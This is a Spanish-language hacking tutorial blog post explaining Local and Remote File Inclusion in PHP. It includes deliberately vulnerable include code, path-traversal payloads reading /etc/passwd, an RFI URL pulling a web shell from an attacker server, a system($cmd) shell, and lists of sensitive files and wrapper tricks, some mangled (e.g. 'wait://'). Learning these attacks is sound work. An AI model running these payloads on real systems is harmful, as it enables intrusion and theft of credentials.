Avatar Blog Personal de K0Hack sobre Conceptos Hacking Etico // HTB // TryHackMe // Resumenes de Hacking // Herramientas para distintas tareas.

Aprendiendo a identificar los diferentes ataques basicos a nivel Web

Web Attacks
Published on 01 May 2021

Empezaremos por aprender las principales Vulnerabilidades a nivel Web

~ LFI ~ Local File Inclusion

1.- La vulnerabilidad de Local File Inclusion se produce como consecuencia de un fallo en la programación de la página, filtrando inadecuadamente lo que se incluye al usar funciones en PHP para incluir archivos desde una variable.

-Ejemplo 1 Para poder corroborar si un sitio es vulnerable, se puede colocar un valor ilógico a la variable. En nuestro ejemplo tenemos: “http://localhost/index.php?page=” donde se coloca un valor, en este caso http://localhost/index.php?page=78se3, algo aleatorio que no se encuentre registrado. Si arroja un error como Warning: main()… o Warning: include()… o similar entonces es probable que sea vulnerable a RFI o LFI

~ Archivo vulnerable de php mediante LFI ~

<?php
include $_GET[pagina];
?>

-Ejemplo 2 Nos montamos un servidor apache ($service apache2 start) que almacene dos archivos:

* example.php
* file.txt

Donde example.php seria:

<?php
    $file = $_GET['filename'];
    include($file);
?>

Y file.txt:

Por Aqui Puede Haber Un LFI

Nosotros apuntando a nuestro servidor podriamos ya listar archivos Locales del servidor, atraves de la variable “filename”

http://localhost/example.php?filename=file.txt
Por Aqui Puede Haber Un LFI
http://localhost/example.php?filename=/etc/passwd
listariamos el archivo /etc/passwd
Esto es un LFI

url-LFI.png

Supongamos que el desarrollador nos indica en donde debe encontrarse el archivo a buscar a traves de una ruta:

<?php
    $file = $_GET['filename'];
    include("/var/www/html/" . $file);
?>
http://localhost/example.php?filename=../../../../../etc/passwd
Y volveriamos a listar el archivo /etc/passwd

~ RFI ~ Remote File Inclusion

La vulnerabilidad de Remote File Inclusion se produce cuando: Una página vulnerable que presente un aspecto similar a este en su URL: “ http://[servidor_victima]/index.php?page=plantilla.html “ El atacante (Nosotros) podriamos obtener una Shell en el servidor vulnerable mediante lo siguiente: http://[servidor_victima]/index.php?page=http://[servidor_atacante]/shell.txt&&cmd=ls

Pudiendo contener el archivo shell.txt cualquier código, por ejemplo:

<?php
  system($cmd);
?>

~ RCE ~ Remote File Inclusion

Algunas formas comunes de pasar de un LFI a RCE: Ahora, por lo general, cuando encuentro una inclusión de archivo local o LFI, primero trato de convertirlo en una ejecución remota de código.

Trucos para convertir su LFI en RCE mediante el ~ Uso de formularios / funciones de carga de archivos:

Usando el contenedor de PHP  wait: // comando
Usando el archivo PHP wrapper  php: //
Usando el contenedor PHP  php: // filter
Usando PHP      input: // stream
Usando datos: // texto / plano; base64, comando
Usando / proc / self / environment
Usando / proc / self / fd

Las siguientes Rutas importantes:

/var/log/apache/access.log
/var/log/apache/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail

Let’s start testing for reading local files related to the operating system. The following are some Linux system files that have sensitive information.

/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline

related posts